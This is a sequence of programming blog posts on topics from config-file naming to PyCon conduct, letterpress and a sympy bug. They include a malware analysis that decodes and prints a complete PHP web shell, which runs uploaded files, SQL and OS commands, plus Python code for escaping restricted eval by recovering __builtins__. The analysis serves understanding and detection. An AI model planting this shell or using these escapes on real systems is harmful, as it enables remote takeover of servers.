Coverage.py reads a configuration file, which by default is in .coveragerc, with a leading dot. For years I thought Pylint had no default config file, because it wouldn't find .pylintrc, it turns out it looks by default for pylintrc, no leading dot.

Which is correct?

I guess I was modeling .coveragerc on .bashrc, .vimrc, and all the other files that clutter home directories everywhere. But is that right? I asked on twitter a few months ago:

Should config files have initial dots or not? tox.ini vs .gitignore, for example. Reasons?

A few people said they should have dots if they are in your home directory, which is clearly true. But these config files are not meant for the home directory.

Larry Price responded,

essential versus incidental, .gitignore or .bashrc are incidental to any given task, but tox.ini or settings.py are the task itself.

Hmm, an interesting point. So is .coveragerc essential to coverage.py? It's only for overriding defaults, so it isn't required. But it does specify how coverage.py should behave.

Should it be coveragerc instead? Or coverage.rc? Opinions? Of course, .coveragerc files will still be recognized if a new default is used. I know this is a small point, but I'd like to follow the consensus if there is one.

The fallout from PyCon this year has been dramatic, involving Adria Richards, Alex Reid, SendGrid, PlayHaven, and the PyCon organizers. I wasn't involved in this event at all, so I have no first-hand knowledge of it, but it saddens me greatly. So many things have happened that I wish had not happened.

Improving community is difficult. Getting 2500 people together without friction is impossible. Friction and offense will happen, the question is, what do we do about it? It seems to me there are two mindsets about how to improve a community.

The first mindset is, "Let's get rid of the assholes, and the people that are left will be a great community." I'll call this the shunning model: identify the Bad People, get rid of them, and you will have only Good People left.

The second mindset is, "We're all different, and we're going to make mistakes, so let's be thoughtful and educate each other." I'll call this the educating model: people are imperfect, but basically good, and if we can keep an eye on things and keep communicating, we can all improve.

When I look back at the aftermath of PyCon, I see a number of events that fit into the shunning model, and few that fit into the education model. This to me seems to be the heart of the problem.

We often talk about building an inclusive community, which usually means that women should be as welcome as men. I want it to also mean that people who make mistakes can be kept as members. Clearly, some people will be difficult enough that they won't be welcome, but most people who offend are good people who've made a mistake, not incorrigible assholes. I don't want a One Strike And You're Out community.

Let me tell you about my experiences at PyCon. I had at least three incidents of "community friction" during my time there:

  • Friday at lunch, I sat across the table from a friend of mine. I made a joke that she found mean, and she told me so. I felt terrible, and apologized to her then, and again later when I saw her next.
  • Saturday night, I was at the rowdy event that engendered a formal response from PyCon: a member was ejected and banned from PyCon. I was more than just an observer: I tried to talk to the member about what he had said. I also helped report it to the PyCon organizers.
  • Monday morning, I was having breakfast with a group of people, both friends and new acquaintances, when someone used the word "retarded" to refer to some suboptimal technical detail. I don't like people using "retarded" as humor. I said nothing, but winked across the table to a friend to say, "yup, I heard it, I wish he wouldn't say that, but I'm not saying anything about it."

In incident #1, I was the offender, and I'm really glad I was educated instead of shunned.

In incident #2, I was the offended. The member in question has been banned. I wasn't part of deciding the sanctions, but am glad to see in his blog post that he is thoughtful about what happened.

In incident #3, I was the offended, but did nothing. If I had known the speaker better, I might have said, "I wish you wouldn't use that word that way," but it didn't seem right at the time.

Friction is inevitable. One of the great things about PyCon is that it is right at the boundary between being comfortable with old friends, and meeting new people. There are bound to be incidents. We have to accept that, and try hard to talk to each other to improve things for everyone.

Education is better than shunning.

Here at PyCon, attendees get the usual ribbons dangling from their badges: Speaker, Sponsor, etc. They're always a topic of conversation, especially if you have three or more, or are wearing any of the joke ones like "Workaholic" or "King".

But most attendees have no ribbons, and it occured to me we could have tokens for everyone. I thought of them as merit badges, but the more current terminology would be acheivements.

For example:

  • I wrote a metaclass
  • I avoided writing a metaclass!
  • I introduced a friend to Guido
  • I contributed to CPython
  • I grok PyPy
  • I taught a kid to program

And so on. Could be fun.

tagged: » 1 reaction

I gave a talk yesterday at PyCon 2013 called Loop Like a Native. The main point was: write more generators. Give it a look.

tagged: , » 4 reactions

I have long been interested in the technology of printing, especially typography. Two years ago, when I went to the Boston Printing Office auction, I met Keith Cross, a lecturer at MassArt. He teaches letterpress classes, usually spread over the course of a semester, which I wasn't able to commit to. When he announced a one-day Saturday workshop, I jumped at it. It happened yesterday, and I loved it.

Initial setup for the class

The workshop is hands-on: you start off standing at a type case, and with a few minutes of verbal instruction, you start putting type into a job stick:

Me, setting type the old-fashioned way.

I was familiar with the concepts of cold metal type, job sticks, California cases, and so on, but had never had a chance to try it myself. I was really pleased to be able to work with these little pieces of metal, and set actual lines of type.

You don't need to know the history of type to take the class, Keith explains what you need to know, and walks around gently guiding people to get them over rough spots.

I was having fun, and so went a little overboard. I wanted to use the fancy ligatures, so I included words like, "fluffy waffles," and when I saw that my type case had a "gg" ligature, I had to add "eggs." Then I discovered it had "zy" and "gy" ligatures, so I couldn't stop until I got "syzygy" in there!

My job stick with three complete lines of type

Each student produced a few lines of type, then we all headed over to the press to assemble them together into a page:

Putting lines of type onto the bed of the press

Once we had all contributed our lines, Keith added larger blocks of iron and wood, known as "furniture" around it to hold it all in place, and locked it in with quoins.

A full page of type, ready to print

A little discussion of paper, the mechanics of the press, then Keith rolls the press, and there's a printed sheet!

The first sheet off the press

The first sheet is called a proof, because it's used to check the typesetting. The next step is to read the proof, an activity known as "proofreading"! One of the things I find fascinating about type is how history bleeds through into the present in the terminology and conventions. "Leading" makes much more visceral sense when you are holding a 6-pt thick bar of lead alloy, and place it between your rows of type.

Reading the proof

Mistakes were identified, as were worn pieces of type. The form in the press was unlocked, and corrections made, by pulling out bits of type with a tweezers, inserting new ones, adjusting spacing, and so on. Then we each printed a sheet of our own.

When the printing was done, and the type had been cleaned, we each retrieved our lines of type, and put each tiny piece back into the proper compartment. Thinking about how long it took to find the type, set the type, adjust the type, print the type, and then clean up and put away the type, I am amazed anew that books, newspapers, and even encyclopedias ever got printed. This was very labor-intensive, dirty work. A few hours in a letterpress shop, and it is clearly industry.

After lunch, we each worked on a project of our own. I chose a quote from E.B. White:

Creation is in part merely the business of forgoing the great and small distractions.

I liked it not only for what it says, but because the words "great" and "small" could be used for a little type expression.

Here's where the old ways really seemed difficult! I wasn't sure what layout to use, and ended up changing my mind half-way through. So I had to move rows of metal chunks from one line to the next, and hope not to drop the whole thing.

Each line has to be completely packed tight with metal so that when the type is on the press, it will all be held tightly in place. This means that you need to find just the right thickness to fill the gaps, perhaps even slivers of brass to finish a tiny space.

My chosen quote, set in cold metal type

I wanted an em-dash, but there wasn't one in my type case. We made one with a 36-pt piece of metal, spaced properly with yet more tiny chunks of metal. After dealing digitally with different kinds of spaces and dashes and leading, it was a new perspective to have to actually build it from pieces of metal.

To add to the complexity, the quote is set in 36-pt Centaur, but the word "small" is in 30-pt. I had to make up the 6-pt difference with strips of metal just as long as the word "small", but some above and some below to get the baseline right. I'd like to have used 24-pt for greater differentiation, but the next available size below 30 was 18. Another analog limitation.

When it was my turn for the press, Keith set up the form and locked it in, and I printed off a few dozen on gold paper:

My type, in the press

Even before I printed it, there were things I wished I could improve about the layout, but time (and ability!) were short. The stars are there kind of as a distraction, but also because it's fun to use ornaments. But they are too low for the line: you can see in the photo, they are cast on a 36-pt body like the rest of the type, but they have a much lower baseline. I'm not even sure how I would have adjusted for that even if I had had time.

But I'm still very pleased with the result:

The finished result

Keith made the day fun, he's friendly, passionate, knowledgable, and helpful. I highly recommend his class, it's a great way to see what letterpress is all about. It gives you a whole new perspective on type, and the technology that brought us to our current tools and techniques.

This week I began a new job at edX. Well, it isn't really a new job, I've been freelancing with them since October, but now I'm an employee.

edX logo

EdX is a non-profit formed by Harvard and MIT to put their courses online. Other top universities have joined, including Berkeley, Rice, McGill, the Delft University of Technology, and others.

Online learning is huge these days, despite being saddled with the worst acronym ever (MOOC, Massive Open Online Course), so there's no shortage of interesting questions:

  • How do you take an existing university course and put it online?
  • What can you do differently if you are educating 100,000 people at once?
  • What are the best tools to give professors to author courses?
  • How can you automatically grade students' responses even for challenging material like programming or essays?
  • What will online education look like in 10 years? Where and how will it be successful?

There are plenty of smart people at edX working on these questions, and I think we have a good chance at finding the right answers. There's stiff competition from Coursera and Udacity, but edX is a bit different, both because it is a non-profit, and because we are chartered by our universities to help them change on-campus education as well as online education.

Almost everything is written in Python and Django, and we're aiming to open-source what we can.

I'm excited. I enjoyed freelancing for a few years, now I know how that works, and I might go back to it someday. But it feels good to be in the middle of edX, helping build something great.

My mom's wordpress site has some malware on it, and she sent it to me for a professional opinion. The mystery file was called wp-rss3.php. Looking at it showed that there was source code being encoded in it, so understanding what it did would require decoding the data. I fired up a Python prompt, and started picking away.

Read the file, and take a quick look to see what structure it has:

>>> wprss3 = open('wp-rss3.php').read()
>>> wprss3[:100]
'<?php $_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e";$_8b7b1f="\\x62\\x61\\x73\\x'

The file is one long line, so let's split it into lines:

>>> wprss3 = wprss3.replace(' ', '\n').replace(';',';\n').splitlines()
>>> len(wprss3)
6
>>> [len(l) for l in wprss3]
[5, 70, 64, 28123, 13, 2]

OK, six lines, one of which has the bulk of the data. Let's look at them:

>>> wprss3[0]
'<?php'
>>> wprss3[1]
'$_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e";'

The line 0 is uninteresting, but line 1 defines a string using hex escapes. Lots of our steps here will require getting raw data from a string that is the bulk of what we're looking at. Splitting on double-quotes will get us pieces, one of which is the one we want. Rather than counting pieces to find the right one, we know the one we want will be the longest piece. So we can use max() to find the longest piece:

>>> d = max(wprss3[1].split('"'), key=len)
>>> d
'\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e'

One of Python's handy-dandy decoders is 'string_escape' which can turn a string with backslash-x sequences into the correct string:

>>> d.decode('string_escape')
'create_function'

OK, so $_8b7b is "create_function", a PHP function. Let's see what line 2 gives us:

>>> wprss3[2]
'$_8b7b1f="\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65";'
>>> max(wprss3[2].split('"'), key=len).decode('string_escape')
'base64_decode'

Interesting, now for the bulk of the data, line 3:

>>> wprss3[3][:100]
'$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7M'
>>> wprss3[3][-100:]
'OzI0MjsxNzU7Iik7JHo9IiI7Zm9yZWFjaCgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));'

Mentally using our definitions of $_8b7b and $_8b7b1f, this is equivalent to:

$_8b7b1f56 = create_function("", base64_decode("JGs9MTQ...Hop0w=="));

BTW, I did not know that PHP would execute function names in strings as simply as $fnname(), but it does not surprise me.

What's in the base64 data?

>>> d = max(wprss3[3].split('"'), key=len).decode('base64')
>>> len(d)
21064
>>> d[:100]
'$k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;224;253;251;230;225;232;167;202;208;202;2'
>>> d[-100:]
'33;175;175;175;175;242;130;133;242;175;");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);'

The decoded data is 20k long, and visual inspection shows that the middle is just lots of numbers separated by semicolons. The PHP code is decoding those numbers by XORing them with 143, using them as ASCII codepoints, and evaluating the result. So we want to perform the same decoding to see what source code results:

>>> nums = max(d.split('"'), key=len).split(';')
>>> len(nums)
5246
>>> nums[:10]
['234', '253', '253', '224', '253', '208', '253', '234', '255', '224']
>>> source = "".join(chr(int(n) ^ 143) for n in nums)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 1, in <genexpr>
ValueError: invalid literal for int() with base 10: ''
>>> source = "".join(chr(int(n) ^ 143) for n in nums if n)
>>> print source

This finally shows us the source of the backdoor which is executed when the page wp-rss3.php is visited in a browser. I've reformatted it here slightly just to break long lines:

error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('display_errors', "0");

if ($_POST["p"] != "") {
        $_COOKIE["p"] = $_POST["p"];
        setcookie("p", $_POST["p"], time() + 3600);
}

if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
        echo "<form method=post>";
        echo "<input type=text name=p value='' size=50>";
        echo "<input type=submit name=B_SUBMIT value='Check'>";
        echo "</form>";
        exit;
}

if ($_POST["action"] == "upload") {

    $l=$_FILES["filepath"]["tmp_name"];
    $newpath=$_POST["newpath"];
    if ($newpath!="") move_uploaded_file($l,$newpath);
    echo "done";

} else if ($_POST["action"] == "sql") {

    $query = $_POST["query"];
    $query = str_replace("\'","'",$query);
    $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
    mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
    mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
    mysql_close($lnk);
    echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {

    eval(base64_decode($_POST["cmd"]));

} else {

    $disablefunc = @ini_get("disable_functions");
    if (!empty($disablefunc)) {
        $disablefunc = str_replace(" ","",$disablefunc);
        $disablefunc = explode(",",$disablefunc);
    } else $disablefunc = array();

    function myshellexec($cmd) {
        global $disablefunc;
        $result = "";
        if (!empty($cmd)) {
            if (is_callable("exec") and !@in_array("exec",$disablefunc)) {
                @exec($cmd,$result); $result = @join("\n",$result);
            }
            elseif (($result = `$cmd`) !== FALSE) {}
            elseif (is_callable("system") and !@in_array("system",$disablefunc)) {
                $v = @ob_get_contents(); 
                @ob_clean(); 
                @system($cmd); 
                $result = @ob_get_contents(); 
                @ob_clean(); 
                echo $v;
            }
            elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {
                $v = @ob_get_contents(); 
                @ob_clean(); 
                @passthru($cmd); 
                $result = @ob_get_contents(); 
                @ob_clean(); 
                echo $v;
            }
            elseif (is_resource($fp = @popen($cmd,"r"))) {
                $result = "";
                while(!feof($fp)) {$result .= @fread($fp,1024);}
                @pclose($fp);
            }
        }
        return $result;
    }
        $cmd = stripslashes($_POST["cmd"]);
        $cmd_enc = stripslashes($_POST["cmd_enc"]);
        if ($_POST["enc"]==1){
                $cmd=base64_decode($cmd_enc);
        }
        ?>
<script language=javascript type="text/javascript">
<!--
var END_OF_INPUT = -1;
var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W',
'X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0',
'1','2','3','4','5','6','7','8','9','+','/');
var reverseBase64Chars = new Array();
for (var i=0; i < base64Chars.length; i++){
    reverseBase64Chars[base64Chars[i]] = i;
}
var base64Str;
var base64Count;
function setBase64Str(str){
    base64Str = str;
    base64Count = 0;
}
function readBase64(){
    if (!base64Str) return END_OF_INPUT;
    if (base64Count >= base64Str.length) return END_OF_INPUT;
    var c = base64Str.charCodeAt(base64Count) & 0xff;
    base64Count++;
    return c;
}
function encodeBase64(str){
    setBase64Str(str);
    var result = '';
    var inBuffer = new Array(3);
    var lineCount = 0;
    var done = false;
    while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
        inBuffer[1] = readBase64();
        inBuffer[2] = readBase64();
        result += (base64Chars[ inBuffer[0] >> 2 ]);
        if (inBuffer[1] != END_OF_INPUT){
            result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
            if (inBuffer[2] != END_OF_INPUT){
                result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
                result += (base64Chars [inBuffer[2] & 0x3F]);
            } else {
                result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
                result += ('=');
                done = true;
            }
        } else {
            result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
            result += ('=');
            result += ('=');
            done = true;
        }
        lineCount += 4;
        if (lineCount >= 76){
            result += ('\n');
            lineCount = 0;
        }
    }
    return result;
}
function encodeIt(f){
        l=encodeBase64(f.cmd.value);
        f.cmd_enc.value=l;
        f.cmd.value="";
        f.enc.value=1;
        f.submit();
}
//--></script>
        <?

    echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
    echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
    echo "<input type=hidden name=enc value='0'>";
    echo "<input type=hidden name=cmd_enc value=''>";
    echo "<input type=submit name=B_SUBMIT value='Go'>";
    echo "</form>";
    if ($cmd != "") {
        echo "<pre>";
        $cmd=stripslashes($cmd);
        echo "Executing $cmd \n";
        echo myshellexec("$cmd");
        echo "</pre>";
        exit;
    }
}

As you can quickly see, this is a nasty piece of work: it takes commands from the client and will execute PHP code, or SQL, or OS shell commands. I don't understand all the back and forth of the forms handling here, but it doesn't matter, it's clearly intended to let a remote attacker have his way on your machine. Bad stuff.

I wonder if a Wordpress installation could be checked for malware by looking for files that are too high a proportion of base64-encoded text?

I told my mom to remove the file, but I suspect there will be more cleaning up to do...

I sat in on a beginner's programming class a few weeks ago, and I was struck by the bizarre words we routinely use, but which must sound like nonsense to beginners.

Take the simple program:

print "Hello, world!"

What is the word "print" doing here? Printing means to produce marks on a piece of paper. There's no paper involved. And "Hello, world!" is a string? It certainly doesn't look like a piece of string.

Expressions have no range of emotion at all, arguments aren't debating anything. Comprehensions are incomprehensible, floats just lie there. You can't put a price on values, dictionaries have no order.

It's no wonder beginners think we're all nuts.

At edX, we have Python behind the scenes in courses to initialize the state of problems presented to students. Often, these problems are randomized so that different students will see different details in quantitative problems, but each student's random seed is saved so that the student will see the same problem if they revisit the page.

The seed is used to seed the random module before executing any chunk of course Python, so that you can simply use the random module and know that you'll get an appropriate value.

Today I found code like this in a course:

import q
random.seed(the_seed)
# ... generate the problem ...

My task was to refactor how information flowed around, and the_seed wasn't going to be available, so I asked why the code was like this. It seemed odd, because the random module had just been seeded before this code was invoked, so why had the author bothered to re-seed the module with the same seed?

The answer was that it was a mysterious bug from months ago where the first time the code was run, it would produce a different result than any other time, and the re-seeding solved it. The q import seemed to be messing with the random seed, but only the first time.

The "only first time" clue pointed to it being code that is run on import. Remember, Python modules are just a series of statements, and when you import a module, it really executes all the statements. There's no "import mode" that just collects function definitions. If you write a statement with a side effect at the top level of a module, that side effect will happen when you import the module.

But statements in module are only executed the first time the module is imported in a process. Subsequent imports simply produce another reference to the existing module object. Everything pointed to a statement running during import which stomped on the random module.

The q module imported a number of other modules, including numpy and sympy. But why would importing a module re-seed the random module?

A little experimenting showed that sympy was at fault here:

Python 2.7.3 (default, Aug  1 2012, 05:16:07) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> # Some baseline data
>>> import random
>>> random.seed(17)
>>> random.random()
0.5219839097124932
>>> random.random()
0.8066907771186791
>>> random.random()
0.9604947743238768
>>> random.random()
0.2896253777644655
>>> 
>>> # Re-seed, and import sympy
>>> random.seed(17)
>>> import sympy
>>> random.random()
0.8066907771186791
>>>

Looking at the values, after importing sympy, we've skipped ahead one number in our random sequence. So sympy isn't re-seeding the generator, it's consuming a random number.

To find out where, we resorted to a monkey-patching trick: Replace random.random with a booby-trap:

Python 2.7.3 (default, Aug  1 2012, 05:16:07) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import random
>>> random.random = lambda: 1/0
>>> import sympy
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/venv/lib/python2.7/site-packages/sympy/__init__.py", line 20, in <module>
    from sympy.core import *
  File "/venv/lib/python2.7/site-packages/sympy/core/__init__.py", line 8, in <module>
    from expr import Expr, AtomicExpr
  File "/venv/lib/python2.7/site-packages/sympy/core/expr.py", line 2020, in <module>
    from mul import Mul
  File "/venv/lib/python2.7/site-packages/sympy/core/mul.py", line 1197, in <module>
    from numbers import Rational, igcd
  File "/venv/lib/python2.7/site-packages/sympy/core/numbers.py", line 1993, in <module>
    from function import FunctionClass
  File "/venv/lib/python2.7/site-packages/sympy/core/function.py", line 43, in <module>
    from sympy.utilities import default_sort_key
  File "/venv/lib/python2.7/site-packages/sympy/utilities/__init__.py", line 13, in <module>
    from runtests import test, doctest
  File "/venv/lib/python2.7/site-packages/sympy/utilities/runtests.py", line 472, in <module>
    class SymPyTests(object):
  File "/venv/lib/python2.7/site-packages/sympy/utilities/runtests.py", line 475, in SymPyTests
    seed=random.random()):
  File "<stdin>", line 1, in <lambda>
ZeroDivisionError: integer division or modulo by zero

OK, not sure why it's importing its tests when I try to use the package, but looking at the code, here's the culprit:

class SymPyTests(object):
    def __init__(self, ..., seed=random.random()):
        #...
        self._seed = seed

Here we can see the problem. Remember that function arguments are computed once, when the function is defined. Since this function is defined when the module is imported, random.random() will be called during import, consuming one of our random numbers.

Better would be to define it like this:

class SymPyTests(object):
    def __init__(self, ..., seed=None):
        #...
        self._seed = seed
        if self._seed is None:
            self._seed = random.random()

I'm not quite sure which behavior the author wanted, one seed for all the instances, or one seed per instance. I know I don't want importing this module to change my random number sequence.

Amusingly enough, the behavior of the initializer is irrelevant, it's only called in one place, and never defaults the seed argument:

def test(*paths, **kwargs):
    ...
    seed = kwargs.get("seed", None)
    if seed is None:
        seed = random.randrange(100000000)
    t = SymPyTests(..., seed)

The best solution for our code would be to not rely on the module-level random number sequence, and instead use our own Random object. Come to think of it, that's what sympy should do too.

BTW, looking at why sympy is importing test infrastructure when I import it, there's this in sympy/utilities/__init__.py:

"""Some utilities that may help.
"""
from iterables import (flatten, group, take, subsets,
    variations, numbered_symbols, cartes, capture, dict_merge,
    postorder_traversal, preorder_traversal, interactive_traversal,
    prefixes, postfixes, sift, topological_sort)

from lambdify import lambdify
from source import source

from decorator import threaded, xthreaded

from runtests import test, doctest

from cythonutils import cythonized
from timeutils import timed

from misc import default_sort_key

This makes using utilities very convenient, since it contains everything at the top level. But the downside is it means you must always take everything. There is no way to import only part of utilities. Even if you use "from utilities.lambdify import lambdify," Python will execute the utilities/__init__.py file, importing everything.

Lessons:

  • Modules really execute when imported,
  • Function defaults are computed once when the function is defined,
  • Modifying global state like the random module's implicit sequence is bad,
  • Importing stuff into __init__.py makes your code monolithic and harder to use as you want, and
  • Monkey-patching can be a great way to debug problems.
tagged: » 11 reactions

Eryksun commented on yesterday's blog post,

You can recover __builtins__ from a function's __globals__:

f = [t for t in ().__class__.__base__.__subclasses__() if t.__name__ == 'Sized'][0].__len__ __builtins__ = f.__globals__['__builtins__']

Sure enough, that gets you a reference to the built-ins, even in an eval with no builtins. It points up two deficiencies in my searching code from yesterday. First, I was only examining constructed objects, not the classes themselves, but more importantly, I was looking at object's attributes but not the keys in dictionaries!

Here's the updated search code, which also has some nicer uses of generators:

"""Look for builtins..."""

import types

def is_builtins(v):
    """Does v seem to be the builtins?"""
    if hasattr(v, "open") and hasattr(v, "__import__"):
        return True
    if isinstance(v, dict):
        return "open" in v and "__import__" in v
    return False

def construct_some(cl):
    """Construct objects from class `cl`.

    Yields (obj, description) tuples.

    """
    # First yield the class itself
    classname = "{}.{}".format(cl.__module__, cl.__name__)
    yield cl, classname

    made = False
    for args in [
        (), ("x",), ("x", "y"), ("x", "y", "z"),
        ("utf8",), ("os",), (1, 2, 3),
        (0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""),
        # Maybe there are other useful constructor args?
    ]:
        try:
            obj = cl(*args)
        except:
            continue
        desc = "{}{}".format(classname, args)
        yield obj, desc
        made = True
    
    if not made:
        print("Couldn't make a {}".format(classname))

def attributes(obj):
    """Produce a sequence of (name, value), the attributes of `obj`."""
    try:
        for n in dir(obj):
            if n in ('__dict__',):
                continue
            try:
                yield n, getattr(obj, n)
            except:
                continue
    except:
        pass

def items(obj):
    """Produce a sequence of (key, value), the items of `obj`."""
    try:
        for k in obj.keys():
            try:
                yield k, obj[k]
            except:
                continue
    except:
        pass

def attrs_and_items(obj, desc):
    """Produce a sequence of (name, value, desc) for data from `obj`."""
    for n, v in attributes(obj):
        desc2 = "{}.{}".format(desc, n)
        yield n, v, desc2
    for k, v in items(obj):
        desc2 = "{}[{!r}]".format(desc, k)
        yield k, v, desc2

def examine(obj, desc, seen, depth):
    """Examine the data reachable from `obj`, looking for builtins."""
    if depth > 10:
        return
    if id(obj) in seen:
        return
    if isinstance(obj, (type(""), type(b""), type(u""))):
        return

    seen.add(id(obj))

    # Look at the attributes and items
    for n, v, desc2 in attrs_and_items(obj, desc):
        if is_builtins(v):
            print("Looks like {} might be builtins".format(desc2))
        else:
            examine(v, desc2, seen, depth+1)


examined = 0
for cl in object.__subclasses__():
    seen = set()
    for obj, desc in construct_some(cl):
        print("Examining {}".format(desc))
        examine(obj, desc, seen, 0)
    examined += len(seen)

print("Examined {} objects".format(examined))

When I run this code, it finds things like,

...
Looks like reprlib.Repr.__init__.__globals__['builtins'] might be builtins
Looks like os._wrap_close.__enter__.__globals__['lseek'].__self__.__loader__.find_module.__func__.__globals__['__builtins__'] might be builtins
Looks like sre_parse.Pattern.__init__.__globals__['__loader__'].__class__.__init__.__globals__['__builtins__'] might be builtins
Looks like sre_parse.SubPattern.__delitem__.__globals__['__builtins__'] might be builtins
...

and many other similar lines. The builtins were right there all along, if you know where to look.

tagged: » react

I discovered Floyd's follow-up to my Eval really is dangerous post. He catalogs a few interesting variations. At the end, though, he mentions the difficulty of finding the original builtins on Python 3.

If you remember, in Python 2, we did it like this:

[
    c for c in ().__class__.__base__.__subclasses__() 
    if c.__name__ == 'catch_warnings'
][0]()._module.__builtins__

This relies on the fact that warnings.catch_warnings is defined, so we can get it from object's subclasses, and on the fact that that object has a _module attribute which is a module.

Python 3 doesn't seem to have that class defined right off the bat, so we can't count on it for finding the builtins. But, I figured, there must be some other class that would serve the same purpose?

To find out, I tried searching for one. Here's the code I used:

import types

def is_builtins(v):
    """Does v seem to be the builtins?"""
    if hasattr(v, "open") and hasattr(v, "__import__"):
        return True
    if isinstance(v, dict):
        return "open" in v and "__import__" in v
    return False

def construct_some(cl):
    """Construct objects from class `cl`.

    Yields (obj, description) tuples.

    """
    made = False
    for args in [
        (), ("x",), ("x", "y"), ("x", "y", "z"),
        ("utf8",), ("os",), (1, 2, 3),
        (0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""),
        # Maybe there are other useful constructor args?
    ]:
        try:
            obj = cl(*args)
        except:
            continue
        desc = "{}.{}{}".format(cl.__module__, cl.__name__, args)
        yield obj, desc
        made = True
    
    if not made:
        print("Couldn't make a {}.{}".format(cl.__module__, cl.__name__))

def examine_attrs(obj, chain, seen, depth):
    """Examine the attributes on `obj`, looking for builtins."""
    if depth > 10:
        return
    if id(obj) in seen:
        return
    if isinstance(obj, (type(""), type(b""), type(u""))):
        return
    seen.add(id(obj))
    for n in dir(obj):
        try:
            v = getattr(obj, n)
        except:
            continue
        name = chain+"."+n
        if is_builtins(v):
            print("Looks like {} might be builtins".format(name))
        else:
            examine_attrs(v, name, seen, depth+1)

examined = 0
for cl in object.__subclasses__():
    seen = set()
    for obj, desc in construct_some(cl):
        print("Constructed {}".format(desc))
        examine_attrs(obj, desc, seen, 0)
    examined += len(seen)

print("Examined {} objects".format(examined))

This code iterates all the subclasses of object, and tries a bunch of different constructor arguments to try to make one. If it succeeds, it recursively examines the attributes reachable from the object, looking for an object or dict that has "open" and "__import__".

Running this on Python 3.3 sure enough doesn't find anything like builtins, after examining 20k objects. And running it on Python 2.7 finds only the catch_warnings object we had before.

I wouldn't have guessed it was so unusual for an object to hold a reference to a module. Am I overlooking an important principle, or is this just not something people do?

tagged: » 4 reactions

A friend shared a link to an unusual puzzle (click for a full-page PDF):

A Regular Crossword

Each row has a regular expression indicating the letters to fill the row. Each cell is at the intersection of three rows, so there are a number of constraints to satisfy at each point.

Overlapping constraints are a good basis for logic puzzles. Sudoku, Ken-Ken, Nonograms, and plenty of other puzzle forms follow the same recipe: determine the contents of a cell, based on multiple simultaneous constraints.

But the regexes here add an extra dimension. Each of the regexes here has a different form, resulting in different levels of information. Two rows have .*, or no information at all. Another has [CR]*, so we know the entire row is C's and R's. Each row has a different regex, so the interaction is varied across the grid.

I wrote to the author, Dan Gulotta, about how he constructed it, and he told me,

I constructed the letter grid by building it up a few letters at a time. I started out with a blank grid and all of the regular expressions set to '.*'. At each step, I would find a place where I wanted to add a few letters to the grid and then see if I could replace some regular expressions with more constrained ones in order to force those letters to be there. In this way, I was able to ensure that the solution was unique.

A few times during my solving of the puzzle, I used the classic piece of puzzle meta-information as part of the deduction: there is a unique solution. A friend of mine said he solved it without using that fact, but I don't see a reason to avoid it.

By the way, I didn't realize this when I solved it, but there's another level to the puzzle, which is to identify the phrase in it. It was part of the 2013 MIT Mystery Hunt.

tagged: , » 16 reactions

Older:

Even older...